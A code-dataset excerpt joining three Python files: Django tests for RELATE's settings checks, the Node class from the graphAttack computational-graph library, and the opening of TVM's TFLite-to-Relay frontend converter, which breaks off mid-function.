def test_invalid_maintenance_mode_exceptions_list(self):
self.assertCheckMessages(
["relate_session_restart_cooldown_seconds.E001"])
@override_settings(RELATE_SESSION_RESTART_COOLDOWN_SECONDS=INVALID_CONF_NEGATIVE)
def test_invalid_maintenance_mode_exceptions_list_negative(self):
self.assertCheckMessages(
["relate_session_restart_cooldown_seconds.E002"])
class CheckRelateTicketMinutesValidAfterUse(CheckRelateSettingsBase):
msg_id_prefix = "relate_ticket_minutes_valid_after_use"
VALID_CONF = 10
VALID_CONF_BY_CALC = 2 * 5
INVALID_CONF_STR = "10"
INVALID_CONF_LIST = [10]
INVALID_CONF_NEGATIVE = -10
@override_settings()
def test_valid_relate_ticket_not_configured(self):
del settings.RELATE_TICKET_MINUTES_VALID_AFTER_USE
self.assertCheckMessages([])
@override_settings(RELATE_TICKET_MINUTES_VALID_AFTER_USE=None)
def test_valid_relate_ticket_none(self):
self.assertCheckMessages([])
@override_settings(RELATE_TICKET_MINUTES_VALID_AFTER_USE=VALID_CONF)
def test_valid_relate_ticket_minutes_valid_after_use(self):
self.assertCheckMessages([])
@override_settings(RELATE_TICKET_MINUTES_VALID_AFTER_USE=VALID_CONF_BY_CALC)
def test_valid_relate_ticket_minutes_valid_after_use_by_calc(self):
self.assertCheckMessages([])
@override_settings(RELATE_TICKET_MINUTES_VALID_AFTER_USE=INVALID_CONF_STR)
def test_invalid_relate_ticket_minutes_valid_after_use_str(self):
self.assertCheckMessages(
["relate_ticket_minutes_valid_after_use.E001"])
@override_settings(RELATE_TICKET_MINUTES_VALID_AFTER_USE=INVALID_CONF_LIST)
def test_invalid_relate_ticket_minutes_valid_after_use_list(self):
self.assertCheckMessages(
["relate_ticket_minutes_valid_after_use.E001"])
@override_settings(RELATE_TICKET_MINUTES_VALID_AFTER_USE=INVALID_CONF_NEGATIVE)
def test_invalid_relate_ticket_minutes_valid_after_use_negative(self):
self.assertCheckMessages(
["relate_ticket_minutes_valid_after_use.E002"])
def side_effect_os_path_is_dir(*args, **kwargs):
if args[0].startswith("dir"):
return True
return False
def side_effect_os_access(*args, **kwargs):
if args[0].endswith("NEITHER"):
return False
elif args[0].endswith("W_FAIL"):
if args[1] == os.W_OK:
return False
elif args[0].endswith("R_FAIL"):
if args[1] == os.R_OK:
return False
return True
@mock.patch('os.access', side_effect=side_effect_os_access)
@mock.patch("os.path.isdir", side_effect=side_effect_os_path_is_dir)
class CheckGitRoot(CheckRelateSettingsBase):
msg_id_prefix = "git_root"
VALID_GIT_ROOT = "dir/git/root/path"
INVALID_GIT_ROOT_NONE = None
INVALID_GIT_ROOT_LIST = [VALID_GIT_ROOT]
INVALID_GIT_ROOT_SPACES = " "
INVALID_GIT_ROOT_NOT_DIR = "not_dir/git/root/path"
INVALID_GIT_ROOT_W_FAIL = "dir/git/root/path/W_FAIL"
INVALID_GIT_ROOT_R_FAIL = "dir/git/root/path/R_FAIL"
INVALID_GIT_ROOT_W_R_FAIL = "dir/git/root/path/NEITHER"
@override_settings(GIT_ROOT=VALID_GIT_ROOT)
def test_valid_git_root(self, mocked_os_access, mocked_os_path_is_dir):
self.assertCheckMessages([])
@override_settings(GIT_ROOT=INVALID_GIT_ROOT_NONE)
def test_invalid_git_root_none(self, mocked_os_access, mocked_os_path_is_dir):
self.assertCheckMessages(["git_root.E001"])
@override_settings(GIT_ROOT=INVALID_GIT_ROOT_LIST)
def test_invalid_git_root_list(self, mocked_os_access, mocked_os_path_is_dir):
self.assertCheckMessages(["git_root.E002"])
@override_settings(GIT_ROOT=INVALID_GIT_ROOT_SPACES)
def test_invalid_git_root_spaces(self, mocked_os_access, mocked_os_path_is_dir):
self.assertCheckMessages(["git_root.E003"])
@override_settings(GIT_ROOT=INVALID_GIT_ROOT_NOT_DIR)
def test_invalid_git_root(self, mocked_os_access, mocked_os_path_is_dir):
self.assertCheckMessages(["git_root.E003"])
@override_settings(GIT_ROOT=INVALID_GIT_ROOT_W_FAIL)
def test_invalid_git_root_no_write_perm(
self, mocked_os_access, mocked_os_path_is_dir):
# no write permission
self.assertCheckMessages(["git_root.E004"])
@override_settings(GIT_ROOT=INVALID_GIT_ROOT_R_FAIL)
def test_invalid_git_root_no_read_perms(
self, mocked_os_access, mocked_os_path_is_dir):
# no read permission
self.assertCheckMessages(["git_root.E005"])
@override_settings(GIT_ROOT=INVALID_GIT_ROOT_W_R_FAIL)
def test_invalid_git_root_no_both_perms(
self, mocked_os_access, mocked_os_path_is_dir):
# no write and read permissions
self.assertCheckMessages(["git_root.E004", "git_root.E005"])
class CheckRelateCourseLanguages(CheckRelateSettingsBase):
"""
For this tests to pass, LANGUAGE_CODE, LANGUAGES, USE_I18N in
local_settings_example.py should not be configured"""
msg_id_prefix = "relate_languages"
VALID_CONF1 = [
('en', _('my English')),
('zh-hans', _('Simplified Chinese')),
('de', _('German'))]
VALID_CONF2 = (
('en', _('English')),
('zh-hans', _('Simplified Chinese')),
('de', _('German')))
VALID_CONF3 = (
('en', 'English'),
('zh-hans', 'Simplified Chinese'),
('de', _('German')))
VALID_WITH_WARNNING_CONF = (
('en', 'English'),
('zh-hans', 'Simplified Chinese'),
('zh-hans', 'my Simplified Chinese'),
('de', _('German')))
VALID_CONF4 = [('en', ('English',)), ]
VALID_CONF5 = (['en', 'English'],)
VALID_CONF6 = [(('en',), _('English')), ]
INVALID_CONF1 = {
'en': 'English',
'zh-hans': 'Simplified Chinese',
'de': _('German')}
INVALID_CONF2 = (('en',),)
INVALID_CONF3 = [('en',), ([], 'English'), ["1", "2"]]
INVALID_CONF4 = "some thing"
def test_valid(self):
with override_settings(LANGUAGES=self.VALID_CONF1):
self.assertCheckMessages([])
with override_settings(LANGUAGES=self.VALID_CONF2):
self.assertCheckMessages([])
with override_settings(LANGUAGES=self.VALID_CONF3):
self.assertCheckMessages([])
with override_settings(LANGUAGES=self.VALID_CONF4):
self.assertCheckMessages([])
with override_settings(LANGUAGES=self.VALID_CONF5):
self.assertCheckMessages([])
with override_settings(LANGUAGES=self.VALID_CONF6):
self.assertCheckMessages([])
def test_lang_not_list_or_tuple(self):
with override_settings(LANGUAGES=self.INVALID_CONF1):
self.assertCheckMessages(["relate_languages.E002"])
def test_lang_item_not_2_tuple(self):
with override_settings(LANGUAGES=self.INVALID_CONF2):
self.assertCheckMessages(["relate_languages.E002"])
def test_lang_multiple_error(self):
with override_settings(LANGUAGES=self.INVALID_CONF3):
self.assertCheckMessages(["relate_languages.E002"])
def test_lang_type_string(self):
with override_settings(LANGUAGES=self.INVALID_CONF4):
self.assertCheckMessages(["relate_languages.E001"])
def test_item_having_same_lang_code_with_settings_language_code(self):
with override_settings(LANGUAGES=self.VALID_CONF1, LANGUAGE_CODE="en"):
# This should not generate warning of duplicate language entries
# since that is how Django works.
self.assertCheckMessages([])
def test_item_duplicated_inside_settings_languages(self):
with override_settings(LANGUAGES=self.VALID_WITH_WARNNING_CONF,
LANGUAGE_CODE="en-us"):
self.assertCheckMessages(
expected_ids=["relate_languages.W001"],
# 'my Simplified Chinese' is used for language description of
# 'zh-hans' instead of 'Simplified Chinese'
expected_msgs=[
"Duplicate language entries were found in "
"settings.LANGUAGES for 'zh-hans', 'my Simplified "
"Chinese' will be used as its "
"language_description"]
)
class CheckRelateSiteName(CheckRelateSettingsBase):
msg_id_prefix = "relate_site_name"
VALID_CONF = "My RELATE"
INVALID_CONF = ["My RELATE"]
def test_site_name_not_configured(self):
with override_settings():
del settings.RELATE_SITE_NAME
self.assertCheckMessages(["relate_site_name.E001"])
def test_site_name_none(self):
with override_settings(RELATE_SITE_NAME=None):
self.assertCheckMessages(["relate_site_name.E002"])
def test_site_name_invalid_instance_error(self):
with override_settings(RELATE_SITE_NAME=self.INVALID_CONF):
self.assertCheckMessages(["relate_site_name.E003"])
def test_site_name_blank_string(self):
with override_settings(RELATE_SITE_NAME=" "):
self.assertCheckMessages(["relate_site_name.E004"])
TEST_MY_OVERRIDING_TEMPLATES_DIR = "/path/to/my_template/"
def is_dir_side_effect(*args, **kwargs):
if TEST_MY_OVERRIDING_TEMPLATES_DIR in args:
return True
else:
return False
class CheckRelateTemplatesDirs(CheckRelateSettingsBase):
msg_id_prefix = "relate_override_templates_dirs"
VALID_CONF = [TEST_MY_OVERRIDING_TEMPLATES_DIR]
INVALID_CONF1 = TEST_MY_OVERRIDING_TEMPLATES_DIR # string
INVALID_CONF2 = [(TEST_MY_OVERRIDING_TEMPLATES_DIR,)] # items not string
INVALID_CONF3 = [TEST_MY_OVERRIDING_TEMPLATES_DIR,
"some/where/does/not/exist",
"yet/another/invalid/path"]
def test_valid_conf(self):
with override_settings(RELATE_OVERRIDE_TEMPLATES_DIRS=self.VALID_CONF):
with mock.patch("relate.checks.os.path.isdir",
side_effect=is_dir_side_effect):
self.assertCheckMessages([])
def test_not_configured(self):
with override_settings():
del settings.RELATE_OVERRIDE_TEMPLATES_DIRS
self.assertCheckMessages([])
def test_configured_none(self):
with override_settings(RELATE_OVERRIDE_TEMPLATES_DIRS=None):
self.assertCheckMessages([])
def test_invalid_instance_error(self):
with override_settings(RELATE_OVERRIDE_TEMPLATES_DIRS=self.INVALID_CONF1):
self.assertCheckMessages(["relate_override_templates_dirs.E001"])
def test_invalid_item_instance_error(self):
with override_settings(RELATE_OVERRIDE_TEMPLATES_DIRS=self.INVALID_CONF2):
self.assertCheckMessages(["relate_override_templates_dirs.E002"])
def test_invalid_path(self):
with override_settings(RELATE_OVERRIDE_TEMPLATES_DIRS=self.INVALID_CONF3):
with mock.patch("relate.checks.os.path.isdir",
side_effect=is_dir_side_effect):
self.assertCheckMessages(
["relate_override_templates_dirs.W001",
"relate_override_templates_dirs.W001"])
class CheckRelateCustomPageTypesRemovedDeadline(CheckRelateSettingsBase):
msg_id_prefix = "relate_custom_page_types_removed_deadline"
VALID_CONF = datetime(2017, 12, 31, 0, 0)
INVALID_CONF = "2017-12-31 00:00"
@override_settings(RELATE_CUSTOM_PAGE_TYPES_REMOVED_DEADLINE=None)
def test_valid_conf_none(self):
self.assertCheckMessages([])
@override_settings(RELATE_CUSTOM_PAGE_TYPES_REMOVED_DEADLINE=VALID_CONF)
def test_valid_conf(self):
self.assertCheckMessages([])
@override_settings(RELATE_CUSTOM_PAGE_TYPES_REMOVED_DEADLINE=INVALID_CONF)
def test_invalid_conf(self):
self.assertCheckMessages(
["relate_custom_page_types_removed_deadline.E001"])
class CheckRelateDisableCodehiliteMarkdownExtensions(CheckRelateSettingsBase):
msg_id_prefix = "relate_disable_codehilite_markdown_extension"
VALID_CONF = None
VALID_CONF_NO_WARNING = True
WARNING_CONF_NOT_BOOL1 = "some string"
WARNING_CONF_NOT_BOOL2 = ["markdown.extensions.codehilite"]
WARNING_CONF_FALSE = False
@override_settings(RELATE_DISABLE_CODEHILITE_MARKDOWN_EXTENSION=VALID_CONF)
def test_valid_conf(self):
self.assertCheckMessages([])
@override_settings(
RELATE_DISABLE_CODEHILITE_MARKDOWN_EXTENSION=VALID_CONF_NO_WARNING)
def test_valid_conf_no_warning(self):
self.assertCheckMessages([])
@override_settings(
RELATE_DISABLE_CODEHILITE_MARKDOWN_EXTENSION=WARNING_CONF_NOT_BOOL1)
def test_warning_conf_not_bool1(self):
self.assertCheckMessages(
["relate_disable_codehilite_markdown_extension.W001"])
@override_settings(
RELATE_DISABLE_CODEHILITE_MARKDOWN_EXTENSION=WARNING_CONF_NOT_BOOL2)
def test_warning_conf_not_bool2(self):
self.assertCheckMessages(
["relate_disable_codehilite_markdown_extension.W001"])
@override_settings(
RELATE_DISABLE_CODEHILITE_MARKDOWN_EXTENSION=WARNING_CONF_FALSE)
def test_warning_conf_false(self):
self.assertCheckMessages(
["relate_disable_codehilite_markdown_extension.W002"])
class RelateStartupChecksExtraCheckTest(CheckRelateSettingsBase):
msg_id_prefix = "my_custom_check_msg"
INSTANCE_WRONG1 = "tests.resouce.my_check_func"
INSTANCE_WRONG2 = {"path": "tests.resouce.my_check_func"}
@override_settings()
def test_not_configured(self):
del settings.RELATE_STARTUP_CHECKS_EXTRA
register_startup_checks_extra()
@override_settings(RELATE_STARTUP_CHECKS_EXTRA=None)
def test_none(self):
register_startup_checks_extra()
@override_settings(RELATE_STARTUP_CHECKS_EXTRA=INSTANCE_WRONG1)
def test_instance_error1(self):
with self.assertRaises(ImproperlyConfigured) as cm:
register_startup_checks_extra()
expected_error_msg = (
"RELATE_STARTUP_CHECKS_EXTRA must be an instance of list or tuple")
self.assertIn(expected_error_msg, str(cm.exception))
@override_settings(RELATE_STARTUP_CHECKS_EXTRA=INSTANCE_WRONG2)
def test_instance_error2(self):
with self.assertRaises(ImproperlyConfigured) as cm:
register_startup_checks_extra()
expected_error_msg = (
"RELATE_STARTUP_CHECKS_EXTRA must be an instance of list or tuple")
self.assertIn(expected_error_msg, str(cm.exception))
@override_settings(RELATE_STARTUP_CHECKS_EXTRA=[])
def test_empty_list(self):
register_startup_checks_extra()
@override_settings(RELATE_STARTUP_CHECKS_EXTRA=[
"unknown_package.unknown_module.func"])
def test_not_importable_check_func(self):
with self.assertRaises(ImproperlyConfigured) as cm:
register_startup_checks_extra()
expected_error_msg = ("No module named 'unknown_package'")
self.assertIn(expected_error_msg, str(cm.exception))
@override_settings(RELATE_STARTUP_CHECKS_EXTRA=[
"tests.resource.my_custom_check_func1",
"tests.resource.my_custom_check_func2"])
def test_do_check(self):
from tests.utils import mock
with mock.patch("relate.checks.register") as mock_register:
register_startup_checks_extra()
self.assertEqual(mock_register.call_count, 2)
stringified_call_args = ". ".join(
[repr(call) for call in mock_register.call_args_list])
self.assertIn(
"function my_custom_check_func1", stringified_call_args)
self.assertIn(
"function my_custom_check_func2", stringified_call_args)
| 40.095707 | 103 | 0.682691 |
acfa90fbed67013136a9f174a23c4d665cb18fe6 | 6,604 | py | Python | graphAttack/coreNode.py | jgolebiowski/graphAttack | ec8488444b44d0bd54498bf917ee42d821643ee8 | [
"MIT"
] | 51 | 2017-08-16T13:04:43.000Z | 2022-03-30T09:10:30.000Z | graphAttack/coreNode.py | jgolebiowski/graphAttack | ec8488444b44d0bd54498bf917ee42d821643ee8 | [
"MIT"
] | null | null | null | graphAttack/coreNode.py | jgolebiowski/graphAttack | ec8488444b44d0bd54498bf917ee42d821643ee8 | [
"MIT"
] | 12 | 2017-09-27T01:10:02.000Z | 2021-05-05T09:44:56.000Z | """Node definition"""
import numpy as np
class Node(object):
"""Node - a basic building block of the graph
Attributes
----------
endNode : bool
Flag stating whether this is the final node of the graph
name : str
name of the node
outputs : list
list of nodes that operate on output of this node
referenceNumber : int
reference number of this node
result : np.array
output of this node
shape : tuple
shape
"""
shape = None
name = "Node"
referenceNumber = None
def __init__(self):
self.outputs = []
self.result = None
self.endNode = True
def __repr__(self):
"""Represent as a string - usefull for printing
Returns
-------
str
description of this node
"""
output = "<%s>" % self.name
return output
def __add__(self, other):
"""Add operaition through operator overloading
Parameters
----------
other : ga.Node
Second Node ot perform the operation on
Returns
-------
ga.operation
AddOperation
Raises
------
ValueError
This can only be performed on two Node instances
"""
if not isinstance(other, Node):
raise ValueError("This can only be performed on two Node instances")
return AddOperation(self, other)
def __matmul__(self, other):
"""matmul operaition through operator overloading
Parameters
----------
other : ga.Node
Second Node ot perform the operation on
Returns
-------
ga.operation
MatMatmulOperation
Raises
------
ValueError
This can only be performed on two Node instances
"""
if not isinstance(other, Node):
raise ValueError("This can only be performed on two Node instances")
return MatMatmulOperation(self, other)
def __mul__(self, other):
"""multiply operaition through operator overloading
Parameters
----------
other : ga.Node
Second Node ot perform the operation on
Returns
-------
ga.operation
MultiplyOperation
Raises
------
ValueError
This can only be performed on two Node instances
"""
if not isinstance(other, Node):
raise ValueError("This can only be performed on two Node instances")
return MultiplyOperation(self, other)
def __truediv__(self, other):
"""Divide operaition through operator overloading
Parameters
----------
other : ga.Node
Second Node ot perform the operation on
Returns
-------
ga.operation
DivideOperation
Raises
------
ValueError
This can only be performed on two Node instances
"""
if not isinstance(other, Node):
raise ValueError("This can only be performed on two Node instances")
return DivideOperation(self, other)
def prependName(self, string):
"""Prepend name with a string
Parameters
----------
string : str
prefix
"""
self.name = str(string) + self.name
def assignReferenceNumber(self, number):
"""Assign a reference number
Parameters
----------
number : int
reference number
"""
self.referenceNumber = number
self.prependName("op" + str(number) + "-")
def setShape(self):
"""Set the shape of the output of this node"""
raise NotImplementedError("This is an abstract class, this routine should be implemented in children")
def addOutput(self, output):
"""Attach the node that is the output of this Node
Parameters
----------
output : ga.Node
attach an output node to this node
"""
self.outputs.append(output)
self.endNode = False
def resetOutputs(self):
"""Reset outputs of this node"""
self.outputs = []
self.endNode = True
def reset(self):
"""Reset the values and gradients held by this operation"""
raise NotImplemented("This is an abstract class")
def getValue(self):
"""Return a vaue of this operation"""
if (self.result is None):
raise NotImplemented("The result is not set at initialization, maybe use an operation")
return self.result
def broadcast_shape(shp1, shp2):
"""Broadcast the shape of those arrays
Parameters
----------
shp1 : tuple
shape of array 1
shp2 : tuple
shape of array 2
Returns
-------
tuple
shape resulting from broadcasting two arrays using numpy rules
Raises
------
ValueError
Arrays cannot be broadcasted
"""
try:
return np.broadcast(np.empty(shp1), np.empty(shp2)).shape
except ValueError:
raise ValueError("Arrays cannot be broadcasted - %s and %s " % (str(shp1), str(shp2)))
def reduce_shape(inputArr, targetArr):
"""Reduce the dimensions by summing the input array over necesary axis
to obtain the targetArray shape.
Parameters
----------
inputArr : np.array
array 1
targetArr : np.array
array 2
Returns
-------
np.array
Resulting array (sum over the necessary axis)
Raises
------
ValueError
The two arrays cannot be reduced properly
"""
if (inputArr.shape == targetArr.shape):
return inputArr
if (inputArr.ndim == targetArr.ndim):
axReduce = []
for dimIndex in range(inputArr.ndim):
if targetArr.shape[dimIndex] == 1:
axReduce.append(dimIndex)
axReduce = tuple(axReduce)
return np.sum(inputArr, axis=axReduce, keepdims=True)
try:
if (inputArr.shape[1] == targetArr.shape[0]):
return np.sum(inputArr, axis=0)
except (IndexError):
pass
except (TypeError):
pass
try:
if (inputArr.shape[0] == targetArr.shape[1]):
return np.sum(inputArr, axis=1)
except (IndexError):
pass
except (TypeError):
pass
raise ValueError("The two arrays cannot be reduced properly")
from .operations.twoInputOperations import AddOperation, MatMatmulOperation, MultiplyOperation, DivideOperation
| 25.302682 | 111 | 0.570109 |
acfa9148a7566beb0359177374aa49fa202ec084 | 35,611 | py | Python | python/tvm/relay/frontend/tflite.py | ttyang1018/tvm | ade26cacd0767cf14dc053ac4d7778859f83a32c | [
"Apache-2.0"
] | 2 | 2019-12-27T04:50:01.000Z | 2021-02-04T09:54:21.000Z | python/tvm/relay/frontend/tflite.py | ttyang1018/tvm | ade26cacd0767cf14dc053ac4d7778859f83a32c | [
"Apache-2.0"
] | 1 | 2019-08-20T16:19:54.000Z | 2019-08-28T21:21:43.000Z | python/tvm/relay/frontend/tflite.py | ttyang1018/tvm | ade26cacd0767cf14dc053ac4d7778859f83a32c | [
"Apache-2.0"
] | 1 | 2019-07-17T08:10:49.000Z | 2019-07-17T08:10:49.000Z | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=invalid-name, unused-argument
"""Tensorflow lite frontend."""
from __future__ import absolute_import as _abs
import math
import numpy as np
import tvm
from .. import ir_pass
from .. import expr as _expr
from .. import module as _module
from .. import op as _op
from ... import nd as _nd
from .common import ExprTable
__all__ = ['from_tflite']
class TensorWrapper(object):
"""Tensor wrapper for TFLite Tensor"""
def __init__(self, tensor_idx, tensor, buffer):
self.tensor_idx = tensor_idx
self.tensor = tensor
self.buffer = buffer
class OperatorConverter(object):
"""Operator Converted for converting TFLite ops to Relay ops"""
def __init__(self, model, subgraph, exp_tab):
try:
from tflite.BuiltinOperator import BuiltinOperator
from tflite.BuiltinOptions import BuiltinOptions
from tflite.ActivationFunctionType import ActivationFunctionType
except ImportError:
raise ImportError("The tflite package must be installed")
self.model = model
self.subgraph = subgraph
self.exp_tab = exp_tab
self.builtin_op_code = build_str_map(BuiltinOperator())
self.activation_fn_type = build_str_map(ActivationFunctionType())
self.builtin_options = build_str_map(BuiltinOptions())
# Add more operators
self.convert_map = {
'CONV_2D': self.convert_conv2d,
'DEPTHWISE_CONV_2D': self.convert_depthwise_conv2d,
'AVERAGE_POOL_2D': self.convert_average_pool2d,
'RESHAPE': self.convert_reshape,
'RESIZE_BILINEAR': self.convert_resize_bilinear,
'RESIZE_NEAREST_NEIGHBOR': self.convert_resize_nearest_neighbor,
'SOFTMAX': self.convert_softmax,
'SQUEEZE': self.convert_squeeze,
'MAX_POOL_2D': self.convert_max_pool2d,
'CONCATENATION': self.convert_concatenation,
'ADD': self.convert_add,
'SUB': self.convert_sub,
'MUL': self.convert_mul,
'DIV': self.convert_div,
'POW': self.convert_pow,
'MAXIMUM': self.convert_maximum,
'MINIMUM': self.convert_minimum,
'FULLY_CONNECTED': self.convert_fully_connected,
'PAD': self.convert_pad,
'LOGISTIC': self.convert_logistic,
}
def check_unsupported_ops(self):
"""Check unsupported TFLite ops in our converter."""
unsupported_ops_set = set()
for op_idx in range(self.subgraph.OperatorsLength()):
op = self.subgraph.Operators(op_idx)
op_code_str = self.get_op_code_str(op)
if op_code_str not in self.convert_map:
unsupported_ops_set.add(op_code_str)
if unsupported_ops_set:
msg = 'The following operators are not supported in frontend ' \
'TFLite: {}'
ops = str(list(unsupported_ops_set)).strip('[,]')
raise tvm.error.OpNotImplemented(msg.format(ops))
def convert_op_to_relay(self):
"""Convert TFLite ops to relay ops"""
for op_idx in range(self.subgraph.OperatorsLength()):
op = self.subgraph.Operators(op_idx)
op_code_str = self.get_op_code_str(op)
output_tensors = self.get_output_tensors(op)
ret = self.convert_map[op_code_str](op)
if len(output_tensors) == 1:
tensor_idx = output_tensors[0].tensor_idx
self.exp_tab.set_expr(get_tensor_name(self.subgraph, tensor_idx), ret)
else:
for idx, output_tensor in enumerate(output_tensors):
self.exp_tab.set_expr(get_tensor_name(self.subgraph, output_tensor.tensor_idx),
ret[idx])
def get_op_code_str(self, op):
"""Get TFLite ops string representation"""
try:
from tflite.BuiltinOperator import BuiltinOperator
except ImportError:
raise ImportError("The tflite package must be installed")
op_code_list_idx = op.OpcodeIndex()
op_code_id = self.model.OperatorCodes(op_code_list_idx).BuiltinCode()
op_code_str = self.builtin_op_code[op_code_id]
if op_code_id == BuiltinOperator.CUSTOM:
# Custom operator
raise NotImplementedError("Custom operators are currently not supported")
return op_code_str
def get_input_tensors(self, op):
operator_inputs = op.InputsAsNumpy()
return self.get_tensors(operator_inputs)
def get_output_tensors(self, op):
operator_outputs = op.OutputsAsNumpy()
return self.get_tensors(operator_outputs)
def get_tensors(self, tensors_idx_list):
"""Get tensor wrapper list from given TFLite tensor index list"""
return_list = list()
for tensor_idx in tensors_idx_list:
if tensor_idx < 0:
return_list.append(TensorWrapper(tensor_idx, 0, 0))
continue
tensor = self.subgraph.Tensors(tensor_idx)
buffer_idx = tensor.Buffer()
buffer = self.model.Buffers(buffer_idx)
return_list.append(TensorWrapper(tensor_idx, tensor, buffer))
return return_list
def get_tensor_value(self, tensor_wrapper):
"""Get tensor buffer value from given tensor wrapper"""
assert isinstance(tensor_wrapper, TensorWrapper)
try:
from tflite.TensorType import TensorType
except ImportError:
raise ImportError("The tflite package must be installed")
if tensor_wrapper.tensor.Type() == TensorType.UINT8:
return np.frombuffer(tensor_wrapper.buffer.DataAsNumpy(), dtype=np.uint8).reshape(
tensor_wrapper.tensor.ShapeAsNumpy())
if tensor_wrapper.tensor.Type() == TensorType.FLOAT32:
return np.frombuffer(tensor_wrapper.buffer.DataAsNumpy(), dtype=np.float32).reshape(
tensor_wrapper.tensor.ShapeAsNumpy())
if tensor_wrapper.tensor.Type() == TensorType.INT32:
return np.frombuffer(tensor_wrapper.buffer.DataAsNumpy(), dtype=np.int32).reshape(
tensor_wrapper.tensor.ShapeAsNumpy())
raise NotImplementedError("Tensor type {} is currently not supported"
.format(str(tensor_wrapper.tensor.Type())))
def get_tensor_type_str(self, tensor_type):
"""Get tensor type string representation when given TFLite tensor type"""
try:
from tflite.TensorType import TensorType
except ImportError:
raise ImportError("The tflite package must be installed")
if tensor_type == TensorType.UINT8:
return "uint8"
if tensor_type == TensorType.FLOAT32:
return "float32"
if tensor_type == TensorType.INT32:
return "int32"
raise NotImplementedError("Tensor type {} is currently not supported"
.format(str(tensor_type)))
def convert_conv2d(self, op):
"""Convert TFLite conv2d"""
return self.convert_conv(op, "conv2d")
def convert_depthwise_conv2d(self, op):
"""Convert TFLite depthwise conv2d"""
return self.convert_conv(op, "depthwise")
def convert_average_pool2d(self, op):
"""Convert TFLite average pool2d"""
return self.convert_pool2d(op, "average")
def convert_max_pool2d(self, op):
"""Convert TFLite max pool2d"""
return self.convert_pool2d(op, "max")
def convert_reshape(self, op):
"""Convert TFLite reshape"""
try:
from tflite.BuiltinOptions import BuiltinOptions
from tflite.Operator import Operator
from tflite.ReshapeOptions import ReshapeOptions
except ImportError:
raise ImportError("The tflite package must be installed")
assert isinstance(op, Operator)
input_tensors = self.get_input_tensors(op)
assert len(input_tensors) == 2, "input tensors length should be 2"
input_tensor = input_tensors[0]
input_tensor_idx = input_tensor.tensor_idx
assert op.BuiltinOptionsType() == BuiltinOptions.ReshapeOptions
op_options = op.BuiltinOptions()
reshape_options = ReshapeOptions()
reshape_options.Init(op_options.Bytes, op_options.Pos)
target_shape = reshape_options.NewShapeAsNumpy()
in_expr = self.get_expr(input_tensor_idx)
out = _op.reshape(in_expr, newshape=tuple(target_shape))
return out
def _convert_resize(self, method, op):
"""Generic method to Convert TFLite RESIZE operators"""
try:
from tflite.BuiltinOptions import BuiltinOptions
from tflite.Operator import Operator
from tflite.ResizeBilinearOptions import ResizeBilinearOptions
# ResizeNearestNeighborOptions was added in tflite v1.13
tflite_ver = 1120
if 'ResizeNearestNeighborOptions' in dir(BuiltinOptions):
from tflite.ResizeNearestNeighborOptions import ResizeNearestNeighborOptions
tflite_ver = 1130
except ImportError:
raise ImportError("The tflite package must be installed")
assert isinstance(op, Operator)
input_tensors = self.get_input_tensors(op)
assert len(input_tensors) == 2, "input tensors length should be 2"
# images, 4-D Tensor with shape NHWC.
input_tensor = input_tensors[0]
in_expr = self.get_expr(input_tensor.tensor_idx)
# size - 1-D int32 Tensor of 2 elements: new_height, new_width
target_size = tuple(self.get_tensor_value(input_tensors[1]))
# Options - align_corners (bool)
resize_options = None
align_corners = False
if method == "BILINEAR":
assert op.BuiltinOptionsType() == BuiltinOptions.ResizeBilinearOptions
resize_options = ResizeBilinearOptions()
elif tflite_ver >= 1130:
assert op.BuiltinOptionsType() == BuiltinOptions.ResizeNearestNeighborOptions
resize_options = ResizeNearestNeighborOptions()
if resize_options is not None:
op_options = op.BuiltinOptions()
resize_options.Init(op_options.Bytes, op_options.Pos)
align_corners = resize_options.AlignCorners()
# Use layout NHWC
out = _op.image.resize(in_expr, target_size, "NHWC", method, align_corners)
return out
def convert_resize_bilinear(self, op):
"""Convert TFLite RESIZE_BILINEAR"""
return self._convert_resize("BILINEAR", op)
def convert_resize_nearest_neighbor(self, op):
"""Convert TFLite RESIZE_NEAREST_NEIGHBOR"""
return self._convert_resize("NEAREST_NEIGHBOR", op)
def convert_logistic(self, op):
"""Convert TFLite LOGISTIC"""
try:
from tflite.Operator import Operator
except ImportError:
raise ImportError("The tflite package must be installed")
assert isinstance(op, Operator)
input_tensors = self.get_input_tensors(op)
assert len(input_tensors) == 1, "input tensors length should be 1"
input_tensor = input_tensors[0]
in_expr = self.get_expr(input_tensor.tensor_idx)
out = _op.sigmoid(in_expr)
return out
def convert_softmax(self, op):
"""Convert TFLite softmax"""
try:
from tflite.Operator import Operator
except ImportError:
raise ImportError("The tflite package must be installed")
assert isinstance(op, Operator)
input_tensors = self.get_input_tensors(op)
assert len(input_tensors) == 1, "input tensors length should be 1"
input_tensor = input_tensors[0]
input_tensor_idx = input_tensor.tensor_idx
params = {'axis': 1} # 1 is channel
in_expr = self.get_expr(input_tensor_idx)
out = _op.nn.softmax(in_expr, **params)
return out
def convert_concatenation(self, op):
"""Convert TFLite concatenation"""
try:
from tflite.Operator import Operator
from tflite.ConcatenationOptions import ConcatenationOptions
from tflite.BuiltinOptions import BuiltinOptions
from tflite.ActivationFunctionType import ActivationFunctionType
except ImportError:
raise ImportError("The tflite package must be installed")
assert isinstance(op, Operator)
input_tensors = self.get_input_tensors(op)
assert len(input_tensors) >= 1, "input tensors should greater than 1"
in_exprs = [self.get_expr(input_tensor.tensor_idx) for input_tensor in input_tensors]
output_tensors = self.get_output_tensors(op)
assert len(output_tensors) == 1, "output tensors should be 1"
assert op.BuiltinOptionsType() == BuiltinOptions.ConcatenationOptions
op_options = op.BuiltinOptions()
concatenation_options = ConcatenationOptions()
concatenation_options.Init(op_options.Bytes, op_options.Pos)
concatenation_axis = concatenation_options.Axis()
fused_activation_fn = concatenation_options.FusedActivationFunction()
# with axis in N H W C
out = _op.concatenate(in_exprs, axis=concatenation_axis)
# if we have activation fn
if fused_activation_fn != ActivationFunctionType.NONE:
out = self.convert_fused_activation_function(out, fused_activation_fn)
return out
def _convert_elemwise(self, relay_op, op):
"""Generic method to Convert TFLite elemwise"""
try:
from tflite.Operator import Operator
from tflite.AddOptions import AddOptions
from tflite.SubOptions import SubOptions
